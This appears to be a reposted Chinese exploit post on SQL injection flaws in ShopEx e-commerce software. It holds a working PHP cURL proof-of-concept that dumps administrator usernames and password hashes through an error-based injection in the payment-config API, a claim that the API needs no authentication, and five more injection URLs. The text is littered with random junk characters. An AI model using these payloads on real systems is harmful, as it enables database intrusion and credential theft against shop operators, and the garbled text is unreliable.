|
缺陷文件:\core\api\payment\2.0\api_b2b_2_0_payment_cfg.php# g/ h; m; T$ o. ^( w) S, i9 ]1 D
core\api\payment\1.0\api_b2b_2_0_payment_cfg.php
( L0 z6 W1 F, Y
% t0 n( @4 P& ^4 X7 ^ N第44行 $data['columns'] 未做过滤导致注入, C- S% f/ B, B9 x* y+ m; g
# q" X! ]( C$ W
<?php set_time_limit(0); ob_flush(); echo 'Test: http://localhost:808'."\r\n"; $sql = 'columns=* from sdb_payment_cfg WHERE 1 and (select 1 from(select count(*),concat((select (select (SELECT concat(username,0x7c,userpass) FROM sdb_operators limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#&disabled=1'; $url='http://localhost:808/api.php?act=search_payment_cfg_list&api_version=2.0'; $ch = curl_init(); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_URL,$url); curl_setopt($ch, CURLOPT_POSTFIELDS, $sql); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); flush(); $data = curl_exec($ch); echo $data; curl_close($ch); ?>外带一句 ShopEx对API操作的模块未做认证,任何用户都可访问,攻击者可通过它来对产品的分类,类型,规格,品牌等,进行添加,删除和修改,过滤不当还可造成注入.( x; g) z- }; G" b$ E! E% W
4 F9 }/ X: ?+ D" O9 }2 R* g注射1:/ s3 {) c7 Y9 d. Z, B/ M" U: y
% c+ V2 I; B7 O4 ohttp://www.0day5.com/api.php POST act=search_sub_regions&api_version=1.0&return_data=string&p_region_id=22 and (select 1 from(select count(*),concat(0x7c,(select (Select version()) from information_schema.tables limit 0,1),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)#4 G- P6 R2 V) h, U7 ^2 Y
$ A* Q: [; d% J ^$ s6 _
注射2:
+ o0 ?8 |+ [! ? Nhttp://www.0day5.com/shopex/api.php act=add_category&api_version=3.1&datas={"name":"name' and 1=x %23"}% X( l$ S3 @" f, G6 K
w$ Y0 P8 L4 n. x: ?注射3:
. S1 d( o. b) T- w- P. N http://www.0day5.com/shopex/api.php act=get_spec_single&api_version=3.1&spec_id=1 xxx- z6 x6 m$ L0 S2 O- }% b& C
注射4:
. S' j* f. S5 a: N$ f# u/ w) q
6 I. h9 D8 U6 t% j) S1 mhttp://www.0day5.com/shopex/api.php act=online_pay_center&api_version=1.0&order_id=1x&pay_id=1¤cy=14 d4 |: R% z; \: U/ |
% N7 Y% O I1 p
" M' D+ j4 b" P; l5 _0 J注射5:
5 b+ T' g2 A+ V/ p* R http://www.0day5.com/shopex/api.php act=search_dly_h_area&return_data=string&columns=xxxxx
8 r( @4 a% ?. S5 v
/ B( j2 U; X$ d" B( S) L3 y" M; q6 u5 U" q W; _- N* S
2 R8 e* o/ }# c- a3 P
g5 r9 q( e" p
/ S3 g) W" q. {" A0 ]6 c( c6 e1 Y$ n8 M( {
|
|